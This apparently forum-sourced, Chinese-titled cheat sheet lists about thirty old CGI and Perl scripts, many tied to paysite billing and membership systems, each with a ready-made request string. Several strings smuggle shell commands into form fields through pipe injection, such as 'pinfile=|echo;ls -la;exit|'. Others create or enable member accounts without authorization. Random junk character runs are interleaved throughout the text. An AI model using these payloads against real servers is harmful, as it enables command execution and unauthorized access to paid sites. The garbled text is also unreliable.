Cgi-bin 30个漏洞＋使用方法

admin

==============================

/smspass.pl
username=username&password=password

/index.cgi
2 O4 ~1 g3 W) `2 Awei=ren&gen=command

/passmaster.cgi
! w9 z; p' u; y# [) N  z2 tAction=Add&Username=Username&Password=Password

3 R6 ~7 X% L0 K( _/accountcreate.cgi
7 i& A! r$ K& w, o2 Dusername=username&password=password&ref1=|echo;ls|

/form.cgi
9 v) _+ s/ z. [6 y6 u% @name=xxxx&email=email&subject=xxxx&response=|echo;ls|
$ d. u0 C+ H  V
/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
- a* r; l3 D, @" xuser=username&pass=Password&confirm=Password
8 T) a. H3 M1 u8 O
/ q  a9 o$ D2 d+ l  W5 |0 ]9 z/ccbill-local.asp
2 h2 Z! s( F% |: B4 ~( [% apost_values=username:password
- _; V. p$ Y- l' W( f5 |
8 E% S& d0 v' o4 B' ^" d& D$ O7 m0 d5 O/count.cgi
1 ~* o0 |1 ]2 ~- ipinfile=|echo;ls -la;exit|

/recon.cgi
% I$ v, n2 E- ~3 f/ D4 C$ d) q/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|

: ~$ z0 w; H! A' k* Q/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
8 T% n) H. }& x, Z' c, ^! s" X
/af.cgi
_browser_out=|echo;ls -la;exit;|

5 d2 L9 v% ]+ m4 K, A( F/modify.cgi
username=username&password=password&expire=30
' B: j5 L5 z4 j2 ~- P# ?$ j
/ j% F- U. P2 M7 D6 w/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|

/gx9passwd.cgi
cmd=ADD&user=username&pass=password
: p4 ^/ J7 K) Y$ F6 G# V
/probecontrol.cgi
- j7 B8 v7 R* O- pcommand=enable&username=username&password=password
# t' U$ l% {; _. M
; g' w6 W, n2 q$ Y7 T/recon.cgi
; E! P; Q( H2 x! p6 ^6 F9 B$ O! msearchoption=3&searchfor=echo;ls -la;exit

/htadd.pl
configfile=|echo; ls -alt; exit
9 l6 d7 _& P- ]# J: P9 S
7 @. d9 x9 Y2 |1 E/gx9passwd.cgi
! P1 O2 V/ c( w, C. v' Dcmd=ADD&user=username&pass=password
( ~% P; h2 X( H- L" C; s( v+ O
/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password
, P3 A7 O- L  p- Z$ Y! S1 N1 x9 D5 _
; b: _; x$ t) n) w2 b- j7 {/cpay.cgi
2 z8 p9 i& @; L  H& {4 i0 tcommand=add_member&username=username(EMAIL)&password=password(DES)

; P4 X6 D' W4 |' A4 p' `  E/globill_ut.cgi
do=add&username=username&password=password&wpassword=password

/usercontrol.cgi
' S3 p" {8 C5 lcommand=enable&username=USER&password=PASS
) b2 K+ t; k5 s0 I( M! o( M
/globoSALErum.cgi
& q; {. l9 L8 B7 ?action=ADD&seccode=seccode&login=username&password=password

# O: ], r$ J0 i+ V4 M+ `/ f  ^/addusr.pl
- v- D3 e! _# M5 Huser=USER&pass=PASS&confirm=PASS
# A8 _! M0 n3 k+ d, J2 X( S
/pincount.cgi
! t9 a' }% Q+ _7 B8 R* D2 d+ w$ B/cgi-bin/mastergate/pincount.cgi
' w, P( V& D6 Cpinfile=|echo;pwd;exit|
4 b! w: L( o) c, Z
% X2 K- q) P8 G( M) q/accountcreate.cgi
7 n$ x8 q. ~$ U  F/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
8 l) N* h% q% {. l$ X+ B$ y+ J5 y9 ^
/af.cgi
* L7 y" }! {2 G+ u$ u2 c/env.cgi
ADD+;echo;pwd;exit

/count.cgi
pinfile=|echo;pwd;exit|

/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|

/add.cgi
username=username&password=password&expire=30
6 o6 p7 J. c, R% {" X
==============================
: ?- D3 {! O5 S6 W# D, g% W. S